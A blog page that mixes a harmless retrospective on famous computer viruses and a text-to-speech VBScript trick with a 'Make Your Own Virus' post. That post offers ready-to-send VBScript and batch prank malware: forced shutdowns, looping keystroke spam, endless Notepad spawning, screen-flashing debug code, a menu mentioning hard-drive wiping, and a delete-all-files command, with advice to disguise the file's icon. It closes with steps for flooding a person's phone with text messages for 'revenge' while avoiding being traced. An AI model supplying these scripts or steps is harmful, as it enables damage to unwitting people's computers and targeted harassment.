Showing posts with label Virus. Show all posts

THE 5 WORST COMPUTER VIRUSES

On Sunday Microsoft reported that “…some components of the malware have been signed by certificates    
that allow software to appear as if it was produced by Microsoft.”

This is due to the presence of an an older cryptographic algorithm in Windows Server which may be exploited to make the code appear to be signed by Microsoft.

The algorithm was employed by Terminal Server Licensing Service, which allows for remote desktop access. Microsoft has released an advisory and update to eliminate the security hole that allows certificates to be signed.

Flame is clearly the next evolution in computer virus and got me to thinking of all of the viruses, worms, trojans, and malware that I have had to battle over the past few years.

Disclaimer: Since I was not around for Elk Cloner or Brain, and though I thought the Angry Samoan virus (named after the famed wrestlers) was cleverly named, it did not impact me significantly, so I did not include them in my list.

Here are my top 5 Worms, Trojans, or Viruses.

1. Melissa

A macro virus named after a Miami stripper, was so effective in 1999 that the tidal wave of email traffic it generated caused the likes of Intel and Microsoft to shut down their email servers. The virus contained a Word document labeled List.DOC as an attachment to an email allowing access to porn sites.

The email was first distributed to a Usenet group but quickly got out of hand. When a user opened the email a message, the infected Word attachment was sent to the first 50 names in the user's address book. The scheme was particularly successful because the email bore the name of someone the recipient knew and referenced a document they had allegedly requested. I recall spending long hours cleaning up after this one.

2. The Anna Kournikova Virus

This computer virus was attributed to a Dutch programmer Jan de Wit on February 11, 2001. The virus was designed to trick a recipient into opening a message by suggesting that it contained a picture of the lovely Anna Kournikova, instead the recipient triggered a malicious program.

This was another virus that exploited a user’s Microsoft Outlook mail contacts. The email subject read: "Hi: Check This!", with what appeared to be a picture file labeled "AnnaKournikova.jpg.vbs". Clearly, the attachment was not a JPG, but it was a good bit of social engineering and was an effective transmission mechanism.

3. MyDoom

MyDoom began appearing in inboxes in 2004 and soon became the fastest spreading worm ever to hit the web, exceeding previous records set by the Sobig worm and ILOVEYOU. A side note, though I knew people affected by Sobig and ILOVEYOU, I did not see either of these in the wild.

The reason that MyDoom was effective was that the recipient would receive an email warning of delivery failure – a message we have all seen at one time or another. The message prompted the recipient to investigate thus triggering the worm.

Once the attached file was executed, the worm would send itself to email addresses found in the local address book and also put a copy in a shared folder (KaZaA). Like Klez, MyDoom could spoof email but also had the ability to generate traffic through web searches, which placed a significant load on search engines like Yahoo and Google.

MyDoom was also significant for the second payload that it carried, which was a DDoS attack on the SCO group; albeit not the coordinated sort of attack we would now expect to see with modern bot-nets. The origination of the virus is attributed or suggested to be someone in Russia, but no one was ever able to confirm.

Lastly, MyDoom contained the text “andy; I’m just doing my job, nothing personal, sorry,” which led many to believe that the virus was constructed for a fee for a spammer, though this also was not confirmed. Shot in the dark: if you are the Andy in referenced in MyDoom and are reading this, please comment!

4. Sasser & Netsky

Easily one of the most famous and prolific variants of computer worms, famous for effectiveness and the fact that it was authored by an 18 year-old German, Sven Jaschan, who confessed to having written these and other worms.

Netsky sticks in my mind because it was the first time that a virus insulted other virus authors. Here the authors of both the Bagle and Mydoom worm families were dissed and, in some cases, Netsky included code that removed versions of the competing viruses.

The other reason this one sticks with me was that the author was turned in to authorities by a friend who wanted to collect the $250,000 bounty that Microsoft put up for information about the outbreak. Though obviously, not a really good friend!

5. 2007 Storm Worm

Though I did consider the 1988 Morris worm, regarded as the first worm, I had to go with the 2007 Storm worm as the 5th to include. Known by many names the Storm Worm is a backdoor Trojan that affects Microsoft based computers.

Here, again, we see distribution of payload through email, with the subject reading, “230 dead as storm batters Europe”. The Storm Worm was a Trojan horse that would join the infected computer to a bot-net – a network of remotely-controllable computers. Though it was thought to be a bot-net of millions of computers, the exact numbers were never known.

Flame is clearly the next evolution in computer viruses, and were I an Iranian scientist Flame would definitely be at the top of my list. Which are on your list? Talk Back and Let Me Know.
Read more

MAKE UR PC TALK






Open a text file in notepad and write:

Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

Save the file with a (*.vbs) extension, it will create a VBScript File.
It will prompt you for a text when u open the file, input the text and press ok."

u will hear what u typed this works in xp,may be in vista also.

enjoy!!!
Read more

Make Your Own Virus






All this comand use to type in notepad

1)Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!

Type :




Set oWMP = CreateObject("WMPlayer.OCX.7")

Set colCDROMs = oWMP.cdromCollection

do

if colCDROMs.Count >= 1 then

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

End If

wscript.sleep 5000

loop




Save it as "Anything.VBS" and send it.




2) Toggle your friend's Caps Lock button simultaneously:

Type :




Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{CAPSLOCK}"

loop




Save it as "Anything.VBS" and send it.




3) Convey your friend a lil' message and shut down his / her computer:

Type :




@echo off

msg * I don't like you

shutdown -c "Error! You are too stupid!" -s




Save it as "Anything.BAT" in All Files and send it.




4) Frustrate your friend by making this VBScript hit Enter simultaneously:

Type :




Set wshShell = wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "~(enter)"

loop




Save it as "Anything.VBS" and send it.




5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:

Type :




WScript.Sleep 180000

WScript.Sleep 10000

Set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.Run "notepad"

WScript.Sleep 100

WshShell.AppActivate "Notepad"

WScript.Sleep 500

WshShell.SendKeys "Hel"

WScript.Sleep 500

WshShell.SendKeys "lo "

WScript.Sleep 500

WshShell.SendKeys ", ho"

WScript.Sleep 500

WshShell.SendKeys "w a"

WScript.Sleep 500

WshShell.SendKeys "re "

WScript.Sleep 500

WshShell.SendKeys "you"

WScript.Sleep 500

WshShell.SendKeys "? "

WScript.Sleep 500

WshShell.SendKeys "I a"

WScript.Sleep 500

WshShell.SendKeys "m g"

WScript.Sleep 500

WshShell.SendKeys "ood"

WScript.Sleep 500

WshShell.SendKeys " th"

WScript.Sleep 500

WshShell.SendKeys "ank"

WScript.Sleep 500

WshShell.SendKeys "s! "




Save it as "Anything.VBS" and send it.




6) Frustrate your friend by making this VBScript hit Backspace simultaneously:

Type :




MsgBox "Let's go back a few steps"

Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{bs}"

loop




Save it as "Anything.VBS" and send it.




7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:

Type :




Set wshShell = wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "You are a fool."

loop




Save it as "Anything.VBS" and send it.




8. Open Notepad continually in your friend's computer:

Type :




@ECHO off

:top

START %SystemRoot%\system32\notepad.exe

GOTO top




Save it as "Anything.BAT" and send it.




9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:




1: Shutdown

2: Restart

3: Wipes out your hard drive (BEWARE)

4: Net send

5: Messages then shutdown

Type :




@echo off

title The end of the world

cd C:\

:menu

cls

echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...

pause

echo Pick your poison:

echo 1. Die this way (Wimp)

echo 2. Die this way (WIMP!)

echo 3. DO NOT DIE THIS WAY

echo 4. Die this way (you're boring)

echo 5. Easy way out

set input=nothing

set /p input=Choice:

if %input%==1 goto one

if %input%==2 goto two




Save it as "Anything.BAT" and send it.




You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.




10) THRETEN BY MAKING SCREEN FLASH




To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.




@echo off

echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg

echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg

echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg

echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg

echo g=100>>\z.dbg

echo q>>\z.dbg

debug <\z.dbg>nul

del \z.dbg

But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.

@echo off

:a

echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg

echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg

echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg

echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg

echo g=100>>\z.dbg

echo q>>\z.dbg

debug <\z.dbg>nul

del \z.dbg

goto a




To disable error (ctrl+shirt+esc) then end process wscript.exe

Enjoy!!!^^


11. Delete All files of a Hard disc:--


DEL/F/Q*


Save it as delete command


Note:-Don’t try it in your computer




11. How to make a txt message virus uring mobile phone???


This is question by one of our member !!

but here is the Solution :-

Step1. Make sure that the sim card you are using is not Familiar to the person you want to virus.
we suggest you to used brand new Simcard

Step 2.Load The simcard. at least 30.00 so you can register it to UNLITXT Promo
You can do it to any Network like SUN or Smart

Step 3.Prepare your weird random txt character.you can create your own language,
Whatever that will looks like a programming language, Use you creativity

Samle Character¦ Cellphone Virus
<.>Script/<>%100.15.25.000.87.:"Fatal Error"
Begin<>Virus Name=I Love You^x run ? Yes
/Void-Progindex{Nokia+32bits#.00000&%>
Str:STOP/Config-Never>
<>

Step 4.Get the cellphone Number of the person you want to Virus
Step 5. Start Sending The Virus you Created
Step 6. Do the sending in Full Accelerations and Frequecy (YOu can send the message in 100times per hour or do it in whole a day process!)

By overdoing this. the number where you send the message cant used its cellphone properly because of the abnormal messages that keep popping every seconds or minutes.
This will result.Text message Delay from its realtime Text Messages from Important contacts he have.Even permitted calls will affect the Procedure you made.

Virus Effect:
1.Text Message Receive Failures
2.Consistent Phone Ring
3.Easy Battery Low
4.Frequent Charging
5.Busy or always UN available Line
6.Your Favorite!! " Sweet Vengeance" the person is now irritated and 100% mad!!!
with no clue who is sending that Freaking Message,

YOu can deactivate all your incoming calls so the person can not make a return calls to trace Number of the Cellphone where the virus where came from.

That's it!! You can Now have your sweet Revenge!!!!to the person you hated most!!
Read more